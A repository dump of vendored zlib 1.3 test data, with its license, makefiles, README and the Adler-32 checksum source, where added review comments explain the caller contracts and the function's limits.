internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/LICENSE ================================================ Copyright notice: (C) 1995-2022 Jean-loup Gailly and Mark Adler This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Jean-loup Gailly Mark Adler jloup@gzip.org madler@alumni.caltech.edu ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/Makefile ================================================ all: -@echo "Please use ./configure first. Thank you." distclean: make -f Makefile.in distclean ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/Makefile.in ================================================ # Makefile for zlib # Copyright (C) 1995-2017 Jean-loup Gailly, Mark Adler # For conditions of distribution and use, see copyright notice in zlib.h # To compile and test, type: # ./configure; make test # Normally configure builds both a static and a shared library. 
# If you want to build just a static library, use: ./configure --static # To install /usr/local/lib/libz.* and /usr/local/include/zlib.h, type: # make install # To install in $HOME instead of /usr/local, use: # make install prefix=$HOME CC=cc CFLAGS=-O #CFLAGS=-O -DMAX_WBITS=14 -DMAX_MEM_LEVEL=7 #CFLAGS=-g -DZLIB_DEBUG #CFLAGS=-O3 -Wall -Wwrite-strings -Wpointer-arith -Wconversion \ # -Wstrict-prototypes -Wmissing-prototypes SFLAGS=-O LDFLAGS= TEST_LDFLAGS=$(LDFLAGS) -L. libz.a LDSHARED=$(CC) CPP=$(CC) -E STATICLIB=libz.a SHAREDLIB=libz.so SHAREDLIBV=libz.so.1.3 SHAREDLIBM=libz.so.1 LIBS=$(STATICLIB) $(SHAREDLIBV) AR=ar ARFLAGS=rc RANLIB=ranlib LDCONFIG=ldconfig LDSHAREDLIBC=-lc TAR=tar SHELL=/bin/sh EXE= prefix = /usr/local exec_prefix = ${prefix} libdir = ${exec_prefix}/lib sharedlibdir = ${libdir} includedir = ${prefix}/include mandir = ${prefix}/share/man man3dir = ${mandir}/man3 pkgconfigdir = ${libdir}/pkgconfig SRCDIR= ZINC= ZINCOUT=-I. OBJZ = adler32.o crc32.o deflate.o infback.o inffast.o inflate.o inftrees.o trees.o zutil.o OBJG = compress.o uncompr.o gzclose.o gzlib.o gzread.o gzwrite.o OBJC = $(OBJZ) $(OBJG) PIC_OBJZ = adler32.lo crc32.lo deflate.lo infback.lo inffast.lo inflate.lo inftrees.lo trees.lo zutil.lo PIC_OBJG = compress.lo uncompr.lo gzclose.lo gzlib.lo gzread.lo gzwrite.lo PIC_OBJC = $(PIC_OBJZ) $(PIC_OBJG) # to use the asm code: make OBJA=match.o, PIC_OBJA=match.lo OBJA = PIC_OBJA = OBJS = $(OBJC) $(OBJA) PIC_OBJS = $(PIC_OBJC) $(PIC_OBJA) all: static shared static: example$(EXE) minigzip$(EXE) shared: examplesh$(EXE) minigzipsh$(EXE) all64: example64$(EXE) minigzip64$(EXE) check: test test: all teststatic testshared teststatic: static @TMPST=tmpst_$$; \ if echo hello world | ${QEMU_RUN} ./minigzip | ${QEMU_RUN} ./minigzip -d && ${QEMU_RUN} ./example $$TMPST ; then \ echo ' *** zlib test OK ***'; \ else \ echo ' *** zlib test FAILED ***'; false; \ fi @rm -f tmpst_$$ testshared: shared @LD_LIBRARY_PATH=`pwd`:$(LD_LIBRARY_PATH) ; export 
LD_LIBRARY_PATH; \ LD_LIBRARYN32_PATH=`pwd`:$(LD_LIBRARYN32_PATH) ; export LD_LIBRARYN32_PATH; \ DYLD_LIBRARY_PATH=`pwd`:$(DYLD_LIBRARY_PATH) ; export DYLD_LIBRARY_PATH; \ SHLIB_PATH=`pwd`:$(SHLIB_PATH) ; export SHLIB_PATH; \ TMPSH=tmpsh_$$; \ if echo hello world | ${QEMU_RUN} ./minigzipsh | ${QEMU_RUN} ./minigzipsh -d && ${QEMU_RUN} ./examplesh $$TMPSH; then \ echo ' *** zlib shared test OK ***'; \ else \ echo ' *** zlib shared test FAILED ***'; false; \ fi @rm -f tmpsh_$$ test64: all64 @TMP64=tmp64_$$; \ if echo hello world | ${QEMU_RUN} ./minigzip64 | ${QEMU_RUN} ./minigzip64 -d && ${QEMU_RUN} ./example64 $$TMP64; then \ echo ' *** zlib 64-bit test OK ***'; \ else \ echo ' *** zlib 64-bit test FAILED ***'; false; \ fi @rm -f tmp64_$$ infcover.o: $(SRCDIR)test/infcover.c $(SRCDIR)zlib.h zconf.h $(CC) $(CFLAGS) $(ZINCOUT) -c -o $@ $(SRCDIR)test/infcover.c infcover: infcover.o libz.a $(CC) $(CFLAGS) -o $@ infcover.o libz.a cover: infcover rm -f *.gcda ${QEMU_RUN} ./infcover gcov inf*.c libz.a: $(OBJS) $(AR) $(ARFLAGS) $@ $(OBJS) -@ ($(RANLIB) $@ || true) >/dev/null 2>&1 match.o: match.S $(CPP) match.S > _match.s $(CC) -c _match.s mv _match.o match.o rm -f _match.s match.lo: match.S $(CPP) match.S > _match.s $(CC) -c -fPIC _match.s mv _match.o match.lo rm -f _match.s example.o: $(SRCDIR)test/example.c $(SRCDIR)zlib.h zconf.h $(CC) $(CFLAGS) $(ZINCOUT) -c -o $@ $(SRCDIR)test/example.c minigzip.o: $(SRCDIR)test/minigzip.c $(SRCDIR)zlib.h zconf.h $(CC) $(CFLAGS) $(ZINCOUT) -c -o $@ $(SRCDIR)test/minigzip.c example64.o: $(SRCDIR)test/example.c $(SRCDIR)zlib.h zconf.h $(CC) $(CFLAGS) $(ZINCOUT) -D_FILE_OFFSET_BITS=64 -c -o $@ $(SRCDIR)test/example.c minigzip64.o: $(SRCDIR)test/minigzip.c $(SRCDIR)zlib.h zconf.h $(CC) $(CFLAGS) $(ZINCOUT) -D_FILE_OFFSET_BITS=64 -c -o $@ $(SRCDIR)test/minigzip.c adler32.o: $(SRCDIR)adler32.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)adler32.c crc32.o: $(SRCDIR)crc32.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)crc32.c deflate.o: 
$(SRCDIR)deflate.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)deflate.c infback.o: $(SRCDIR)infback.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)infback.c inffast.o: $(SRCDIR)inffast.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)inffast.c inflate.o: $(SRCDIR)inflate.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)inflate.c inftrees.o: $(SRCDIR)inftrees.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)inftrees.c trees.o: $(SRCDIR)trees.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)trees.c zutil.o: $(SRCDIR)zutil.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)zutil.c compress.o: $(SRCDIR)compress.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)compress.c uncompr.o: $(SRCDIR)uncompr.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)uncompr.c gzclose.o: $(SRCDIR)gzclose.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)gzclose.c gzlib.o: $(SRCDIR)gzlib.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)gzlib.c gzread.o: $(SRCDIR)gzread.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)gzread.c gzwrite.o: $(SRCDIR)gzwrite.c $(CC) $(CFLAGS) $(ZINC) -c -o $@ $(SRCDIR)gzwrite.c adler32.lo: $(SRCDIR)adler32.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/adler32.o $(SRCDIR)adler32.c -@mv objs/adler32.o $@ crc32.lo: $(SRCDIR)crc32.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/crc32.o $(SRCDIR)crc32.c -@mv objs/crc32.o $@ deflate.lo: $(SRCDIR)deflate.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/deflate.o $(SRCDIR)deflate.c -@mv objs/deflate.o $@ infback.lo: $(SRCDIR)infback.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/infback.o $(SRCDIR)infback.c -@mv objs/infback.o $@ inffast.lo: $(SRCDIR)inffast.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/inffast.o $(SRCDIR)inffast.c -@mv objs/inffast.o $@ inflate.lo: $(SRCDIR)inflate.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/inflate.o $(SRCDIR)inflate.c 
-@mv objs/inflate.o $@ inftrees.lo: $(SRCDIR)inftrees.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/inftrees.o $(SRCDIR)inftrees.c -@mv objs/inftrees.o $@ trees.lo: $(SRCDIR)trees.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/trees.o $(SRCDIR)trees.c -@mv objs/trees.o $@ zutil.lo: $(SRCDIR)zutil.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/zutil.o $(SRCDIR)zutil.c -@mv objs/zutil.o $@ compress.lo: $(SRCDIR)compress.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/compress.o $(SRCDIR)compress.c -@mv objs/compress.o $@ uncompr.lo: $(SRCDIR)uncompr.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/uncompr.o $(SRCDIR)uncompr.c -@mv objs/uncompr.o $@ gzclose.lo: $(SRCDIR)gzclose.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/gzclose.o $(SRCDIR)gzclose.c -@mv objs/gzclose.o $@ gzlib.lo: $(SRCDIR)gzlib.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/gzlib.o $(SRCDIR)gzlib.c -@mv objs/gzlib.o $@ gzread.lo: $(SRCDIR)gzread.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/gzread.o $(SRCDIR)gzread.c -@mv objs/gzread.o $@ gzwrite.lo: $(SRCDIR)gzwrite.c -@mkdir objs 2>/dev/null || test -d objs $(CC) $(SFLAGS) $(ZINC) -DPIC -c -o objs/gzwrite.o $(SRCDIR)gzwrite.c -@mv objs/gzwrite.o $@ placebo $(SHAREDLIBV): $(PIC_OBJS) libz.a $(LDSHARED) $(SFLAGS) -o $@ $(PIC_OBJS) $(LDSHAREDLIBC) $(LDFLAGS) rm -f $(SHAREDLIB) $(SHAREDLIBM) ln -s $@ $(SHAREDLIB) ln -s $@ $(SHAREDLIBM) -@rmdir objs example$(EXE): example.o $(STATICLIB) $(CC) $(CFLAGS) -o $@ example.o $(TEST_LDFLAGS) minigzip$(EXE): minigzip.o $(STATICLIB) $(CC) $(CFLAGS) -o $@ minigzip.o $(TEST_LDFLAGS) examplesh$(EXE): example.o $(SHAREDLIBV) $(CC) $(CFLAGS) -o $@ example.o $(LDFLAGS) -L. 
$(SHAREDLIBV) minigzipsh$(EXE): minigzip.o $(SHAREDLIBV) $(CC) $(CFLAGS) -o $@ minigzip.o $(LDFLAGS) -L. $(SHAREDLIBV) example64$(EXE): example64.o $(STATICLIB) $(CC) $(CFLAGS) -o $@ example64.o $(TEST_LDFLAGS) minigzip64$(EXE): minigzip64.o $(STATICLIB) $(CC) $(CFLAGS) -o $@ minigzip64.o $(TEST_LDFLAGS) install-libs: $(LIBS) -@if [ ! -d $(DESTDIR)$(exec_prefix) ]; then mkdir -p $(DESTDIR)$(exec_prefix); fi -@if [ ! -d $(DESTDIR)$(libdir) ]; then mkdir -p $(DESTDIR)$(libdir); fi -@if [ ! -d $(DESTDIR)$(sharedlibdir) ]; then mkdir -p $(DESTDIR)$(sharedlibdir); fi -@if [ ! -d $(DESTDIR)$(man3dir) ]; then mkdir -p $(DESTDIR)$(man3dir); fi -@if [ ! -d $(DESTDIR)$(pkgconfigdir) ]; then mkdir -p $(DESTDIR)$(pkgconfigdir); fi rm -f $(DESTDIR)$(libdir)/$(STATICLIB) cp $(STATICLIB) $(DESTDIR)$(libdir) chmod 644 $(DESTDIR)$(libdir)/$(STATICLIB) -@($(RANLIB) $(DESTDIR)$(libdir)/libz.a || true) >/dev/null 2>&1 -@if test -n "$(SHAREDLIBV)"; then \ rm -f $(DESTDIR)$(sharedlibdir)/$(SHAREDLIBV); \ cp $(SHAREDLIBV) $(DESTDIR)$(sharedlibdir); \ echo "cp $(SHAREDLIBV) $(DESTDIR)$(sharedlibdir)"; \ chmod 755 $(DESTDIR)$(sharedlibdir)/$(SHAREDLIBV); \ echo "chmod 755 $(DESTDIR)$(sharedlibdir)/$(SHAREDLIBV)"; \ rm -f $(DESTDIR)$(sharedlibdir)/$(SHAREDLIB) $(DESTDIR)$(sharedlibdir)/$(SHAREDLIBM); \ ln -s $(SHAREDLIBV) $(DESTDIR)$(sharedlibdir)/$(SHAREDLIB); \ ln -s $(SHAREDLIBV) $(DESTDIR)$(sharedlibdir)/$(SHAREDLIBM); \ ($(LDCONFIG) || true) >/dev/null 2>&1; \ fi rm -f $(DESTDIR)$(man3dir)/zlib.3 cp $(SRCDIR)zlib.3 $(DESTDIR)$(man3dir) chmod 644 $(DESTDIR)$(man3dir)/zlib.3 rm -f $(DESTDIR)$(pkgconfigdir)/zlib.pc cp zlib.pc $(DESTDIR)$(pkgconfigdir) chmod 644 $(DESTDIR)$(pkgconfigdir)/zlib.pc # The ranlib in install is needed on NeXTSTEP which checks file times # ldconfig is for Linux install: install-libs -@if [ ! 
-d $(DESTDIR)$(includedir) ]; then mkdir -p $(DESTDIR)$(includedir); fi rm -f $(DESTDIR)$(includedir)/zlib.h $(DESTDIR)$(includedir)/zconf.h cp $(SRCDIR)zlib.h zconf.h $(DESTDIR)$(includedir) chmod 644 $(DESTDIR)$(includedir)/zlib.h $(DESTDIR)$(includedir)/zconf.h uninstall: cd $(DESTDIR)$(includedir) && rm -f zlib.h zconf.h cd $(DESTDIR)$(libdir) && rm -f libz.a; \ if test -n "$(SHAREDLIBV)" -a -f $(SHAREDLIBV); then \ rm -f $(SHAREDLIBV) $(SHAREDLIB) $(SHAREDLIBM); \ fi cd $(DESTDIR)$(man3dir) && rm -f zlib.3 cd $(DESTDIR)$(pkgconfigdir) && rm -f zlib.pc docs: zlib.3.pdf zlib.3.pdf: $(SRCDIR)zlib.3 groff -mandoc -f H -T ps $(SRCDIR)zlib.3 | ps2pdf - $@ zconf.h.cmakein: $(SRCDIR)zconf.h.in -@ TEMPFILE=zconfh_$$; \ echo "/#define ZCONF_H/ a\\\\\n#cmakedefine Z_PREFIX\\\\\n#cmakedefine Z_HAVE_UNISTD_H\n" >> $$TEMPFILE &&\ sed -f $$TEMPFILE $(SRCDIR)zconf.h.in > $@ &&\ touch -r $(SRCDIR)zconf.h.in $@ &&\ rm $$TEMPFILE zconf: $(SRCDIR)zconf.h.in cp -p $(SRCDIR)zconf.h.in zconf.h minizip-test: static cd contrib/minizip && { CFLAGS="$(CFLAGS)" $(MAKE) test ; cd ../.. ; } minizip-clean: cd contrib/minizip && { $(MAKE) clean ; cd ../.. ; } mostlyclean: clean clean: minizip-clean rm -f *.o *.lo *~ \ example$(EXE) minigzip$(EXE) examplesh$(EXE) minigzipsh$(EXE) \ example64$(EXE) minigzip64$(EXE) \ infcover \ libz.* foo.gz so_locations \ _match.s maketree contrib/infback9/*.o rm -rf objs rm -f *.gcda *.gcno *.gcov rm -f contrib/infback9/*.gcda contrib/infback9/*.gcno contrib/infback9/*.gcov maintainer-clean: distclean distclean: clean zconf zconf.h.cmakein rm -f Makefile zlib.pc configure.log -@rm -f .DS_Store @if [ -f Makefile.in ]; then \ printf 'all:\n\t-@echo "Please use ./configure first. 
Thank you."\n' > Makefile ; \ printf '\ndistclean:\n\tmake -f Makefile.in distclean\n' >> Makefile ; \ touch -r $(SRCDIR)Makefile.in Makefile ; fi tags: etags $(SRCDIR)*.[ch] adler32.o zutil.o: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h gzclose.o gzlib.o gzread.o gzwrite.o: $(SRCDIR)zlib.h zconf.h $(SRCDIR)gzguts.h compress.o example.o minigzip.o uncompr.o: $(SRCDIR)zlib.h zconf.h crc32.o: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)crc32.h deflate.o: $(SRCDIR)deflate.h $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h infback.o inflate.o: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h $(SRCDIR)inflate.h $(SRCDIR)inffast.h $(SRCDIR)inffixed.h inffast.o: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h $(SRCDIR)inflate.h $(SRCDIR)inffast.h inftrees.o: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h trees.o: $(SRCDIR)deflate.h $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)trees.h adler32.lo zutil.lo: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h gzclose.lo gzlib.lo gzread.lo gzwrite.lo: $(SRCDIR)zlib.h zconf.h $(SRCDIR)gzguts.h compress.lo example.lo minigzip.lo uncompr.lo: $(SRCDIR)zlib.h zconf.h crc32.lo: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)crc32.h deflate.lo: $(SRCDIR)deflate.h $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h infback.lo inflate.lo: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h $(SRCDIR)inflate.h $(SRCDIR)inffast.h $(SRCDIR)inffixed.h inffast.lo: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h $(SRCDIR)inflate.h $(SRCDIR)inffast.h inftrees.lo: $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)inftrees.h trees.lo: $(SRCDIR)deflate.h $(SRCDIR)zutil.h $(SRCDIR)zlib.h zconf.h $(SRCDIR)trees.h ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/README ================================================ ZLIB DATA COMPRESSION LIBRARY zlib 1.3 is a general purpose data compression library. All the code is thread safe. 
The data format used by the zlib library is described by RFCs (Request for Comments) 1950 to 1952 in the files http://tools.ietf.org/html/rfc1950 (zlib format), rfc1951 (deflate format) and rfc1952 (gzip format). All functions of the compression library are documented in the file zlib.h (volunteer to write man pages welcome, contact zlib@gzip.org). A usage example of the library is given in the file test/example.c which also tests that the library is working correctly. Another example is given in the file test/minigzip.c. The compression library itself is composed of all source files in the root directory. To compile all files and run the test program, follow the instructions given at the top of Makefile.in. In short "./configure; make test", and if that goes well, "make install" should work for most flavors of Unix. For Windows, use one of the special makefiles in win32/ or contrib/vstudio/ . For VMS, use make_vms.com. Questions about zlib should be sent to zlib@gzip.org, or to Gilles Vollant for the Windows DLL version. The zlib home page is http://zlib.net/ . Before reporting a problem, please check this site to verify that you have the latest version of zlib; otherwise get the latest version and check whether the problem still exists or not. PLEASE read the zlib FAQ http://zlib.net/zlib_faq.html before asking for help. Mark Nelson wrote an article about zlib for the Jan. 1997 issue of Dr. Dobb's Journal; a copy of the article is available at https://marknelson.us/posts/1997/01/01/zlib-engine.html . The changes made in version 1.3 are documented in the file ChangeLog. Unsupported third party contributions are provided in directory contrib/ . zlib is available in Java using the java.util.zip package. Follow the API Documentation link at: https://docs.oracle.com/search/?q=java.util.zip . A Perl interface to zlib and bzip2 written by Paul Marquess can be found at https://github.com/pmqs/IO-Compress . A Python interface to zlib written by A.M.
Kuchling is available in Python 1.5 and later versions, see http://docs.python.org/library/zlib.html . zlib is built into tcl: http://wiki.tcl.tk/4610 . An experimental package to read and write files in .zip format, written on top of zlib by Gilles Vollant , is available in the contrib/minizip directory of zlib. Notes for some targets: - For Windows DLL versions, please see win32/DLL_FAQ.txt - For 64-bit Irix, deflate.c must be compiled without any optimization. With -O, one libpng test fails. The test works in 32 bit mode (with the -n32 compiler flag). The compiler bug has been reported to SGI. - zlib doesn't work with gcc 2.6.3 on a DEC 3000/300LX under OSF/1 2.1 it works when compiled with cc. - On Digital Unix 4.0D (formerly OSF/1) on AlphaServer, the cc option -std1 is necessary to get gzprintf working correctly. This is done by configure. - zlib doesn't work on HP-UX 9.05 with some versions of /bin/cc. It works with other compilers. Use "make test" to check your compiler. - gzdopen is not supported on RISCOS or BEOS. - For PalmOs, see http://palmzlib.sourceforge.net/ Acknowledgments: The deflate format used by zlib was defined by Phil Katz. The deflate and zlib specifications were written by L. Peter Deutsch. Thanks to all the people who reported problems and suggested various improvements in zlib; they are too numerous to cite here. Copyright notice: (C) 1995-2023 Jean-loup Gailly and Mark Adler This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. 
If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Jean-loup Gailly Mark Adler jloup@gzip.org madler@alumni.caltech.edu If you use the zlib library in a product, we would appreciate *not* receiving lengthy legal documents to sign. The sources are provided for free but without warranty of any kind. The library has been entirely written by Jean-loup Gailly and Mark Adler; it does not include third-party code. We make all contributions to and distributions of this project solely in our personal capacity, and are not conveying any rights to any intellectual property of any third parties. If you redistribute modified sources, we would appreciate that you include in the file ChangeLog history information documenting your changes. Please read the FAQ for more information on the distribution of modified source versions. 
================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/adler32.c
================================================
/* adler32.c -- compute the Adler-32 checksum of a data stream
 * Copyright (C) 1995-2011, 2016 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
 */

/* @(#) $Id$ */

/* NOTE(review): Adler-32 is an error-detection checksum, not a cryptographic
   hash. It catches accidental corruption only and gives no assurance against
   deliberate modification, so it must not stand in for a MAC or a signature. */

#include "zutil.h"

#define BASE 65521U     /* largest prime smaller than 65536 */
#define NMAX 5552
/* NMAX is the largest n such that 255n(n+1)/2 + (n+1)(BASE-1) <= 2^32-1 */

/* The DOn macros add n consecutive bytes of buf, starting at index i (DO16
   starts at index 0), into the running sums. They expand to statements that
   use the local variables adler and sum2 of the enclosing function and do no
   reduction modulo BASE themselves. */
#define DO1(buf,i)  {adler += (buf)[i]; sum2 += adler;}
#define DO2(buf,i)  DO1(buf,i); DO1(buf,i+1);
#define DO4(buf,i)  DO2(buf,i); DO2(buf,i+2);
#define DO8(buf,i)  DO4(buf,i); DO4(buf,i+4);
#define DO16(buf)   DO8(buf,0); DO8(buf,8);

/* use NO_DIVIDE if your processor does not do division in hardware --
   try it both ways to see which is faster */
#ifdef NO_DIVIDE
/* note that this assumes BASE is 65521, where 65536 % 65521 == 15
   (thank you to John Reiser for pointing this out) */
#  define CHOP(a) \
    do { \
        unsigned long tmp = a >> 16; \
        a &= 0xffffUL; \
        a += (tmp << 4) - tmp; \
    } while (0)
#  define MOD28(a) \
    do { \
        CHOP(a); \
        if (a >= BASE) a -= BASE; \
    } while (0)
#  define MOD(a) \
    do { \
        CHOP(a); \
        MOD28(a); \
    } while (0)
#  define MOD63(a) \
    do { /* this assumes a is not negative */ \
        z_off64_t tmp = a >> 32; \
        a &= 0xffffffffL; \
        a += (tmp << 8) - (tmp << 5) + tmp; \
        tmp = a >> 16; \
        a &= 0xffffL; \
        a += (tmp << 4) - tmp; \
        tmp = a >> 16; \
        a &= 0xffffL; \
        a += (tmp << 4) - tmp; \
        if (a >= BASE) a -= BASE; \
    } while (0)
#else
/* With hardware division all three reductions are a plain remainder. */
#  define MOD(a) a %= BASE
#  define MOD28(a) a %= BASE
#  define MOD63(a) a %= BASE
#endif

/* ========================================================================= */
/* Update a running Adler-32 value with len bytes read from buf and return the
   new value. The value is handled as two 16-bit halves: the low half is kept
   in adler and the high half in sum2, and they are recombined on return.

   adler -- checksum so far; bits above the low 32 are discarded.
   buf   -- input bytes, or Z_NULL to request the initial value.
   len   -- number of bytes to read from buf.

   Returns 1 when buf is Z_NULL and len != 1, otherwise the updated checksum.

   Caller contract: exactly len bytes are read from buf and nothing here can
   check that the buffer is that large, so len has to come from the real
   buffer size, never from an unchecked length field in the data being parsed.
   The len == 1 fast path runs before the Z_NULL test, so the call
   (adler, Z_NULL, 1) reads through a null pointer; use len 0 with Z_NULL. */
uLong ZEXPORT adler32_z(uLong adler, const Bytef *buf, z_size_t len) {
    unsigned long sum2;
    unsigned n;

    /* split Adler-32 into component sums */
    sum2 = (adler >> 16) & 0xffff;
    adler &= 0xffff;

    /* in case user likes doing a byte at a time, keep it fast */
    if (len == 1) {
        /* buf is dereferenced here, before the Z_NULL check below */
        adler += buf[0];
        if (adler >= BASE)
            adler -= BASE;
        sum2 += adler;
        if (sum2 >= BASE)
            sum2 -= BASE;
        return adler | (sum2 << 16);
    }

    /* initial Adler-32 value (deferred check for len == 1 speed) */
    if (buf == Z_NULL)
        return 1L;

    /* in case short lengths are provided, keep it somewhat fast */
    if (len < 16) {
        while (len--) {
            adler += *buf++;
            sum2 += adler;
        }
        if (adler >= BASE)
            adler -= BASE;
        MOD28(sum2);            /* only added so many BASE's */
        return adler | (sum2 << 16);
    }

    /* do length NMAX blocks -- requires just one modulo operation */
    /* the reduction is deferred to the end of each NMAX-byte block; the bound
       stated next to the NMAX definition is what makes that deferral safe */
    while (len >= NMAX) {
        len -= NMAX;
        n = NMAX / 16;          /* NMAX is divisible by 16 */
        do {
            DO16(buf);          /* 16 sums unrolled */
            buf += 16;
        } while (--n);
        MOD(adler);
        MOD(sum2);
    }

    /* do remaining bytes (less than NMAX, still just one modulo) */
    if (len) {                  /* avoid modulos if none remaining */
        while (len >= 16) {
            len -= 16;
            DO16(buf);
            buf += 16;
        }
        while (len--) {
            adler += *buf++;
            sum2 += adler;
        }
        MOD(adler);
        MOD(sum2);
    }

    /* return recombined sums */
    return adler | (sum2 << 16);
}

/* ========================================================================= */
/* Same as adler32_z() with the length given as a uInt; the value is passed
   straight through to the z_size_t parameter, so the caller contract of
   adler32_z() (buffer size, Z_NULL handling) applies unchanged. */
uLong ZEXPORT adler32(uLong adler, const Bytef *buf, uInt len) {
    return adler32_z(adler, buf, len);
}

/* ========================================================================= */
/* Shared implementation behind adler32_combine() and adler32_combine64():
   derives one Adler-32 value from adler1, adler2 and len2 without reading any
   of the underlying data. Presumably len2 is the length of the byte sequence
   adler2 was computed over -- confirm against the declaration in zlib.h.

   A negative len2 returns 0xffffffff, which the original comment below calls
   an invalid Adler-32 value. The sentinel has the same type as a real result,
   so a caller that takes len2 from a file or network field should reject
   negative values itself rather than rely on noticing it afterwards. */
local uLong adler32_combine_(uLong adler1, uLong adler2, z_off64_t len2) {
    unsigned long sum1;
    unsigned long sum2;
    unsigned rem;

    /* for negative len, return invalid adler32 as a clue for debugging */
    if (len2 < 0)
        return 0xffffffffUL;

    /* the derivation of this formula is left as an exercise for the reader */
    MOD63(len2);                /* assumes len2 >= 0 */
    rem = (unsigned)len2;
    sum1 = adler1 & 0xffff;
    sum2 = rem * sum1;
    MOD(sum2);
    sum1 += (adler2 & 0xffff) + BASE - 1;
    sum2 += ((adler1 >> 16) & 0xffff) + ((adler2 >> 16) & 0xffff) + BASE - rem;
    /* sum1 is a sum of three terms; when both input halves are below BASE it
       stays under 3*BASE, so two conditional subtractions reduce it fully */
    if (sum1 >= BASE) sum1 -= BASE;
    if (sum1 >= BASE) sum1 -= BASE;
    if (sum2 >= ((unsigned long)BASE << 1)) sum2 -= ((unsigned long)BASE << 1);
    if (sum2 >= BASE) sum2 -= BASE;
    return sum1 | (sum2 << 16);
}

/* ========================================================================= */
/* Exported entry point taking len2 as z_off_t; forwards to
   adler32_combine_(), including its 0xffffffff result for a negative len2. */
uLong ZEXPORT adler32_combine(uLong adler1, uLong adler2, z_off_t len2) {
    return adler32_combine_(adler1, adler2, len2);
}

/* Exported entry point taking len2 as z_off64_t; forwards to
   adler32_combine_(), including its 0xffffffff result for a negative len2. */
uLong ZEXPORT adler32_combine64(uLong adler1, uLong adler2, z_off64_t len2) {
    return adler32_combine_(adler1, adler2, len2);
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/amiga/Makefile.pup
================================================
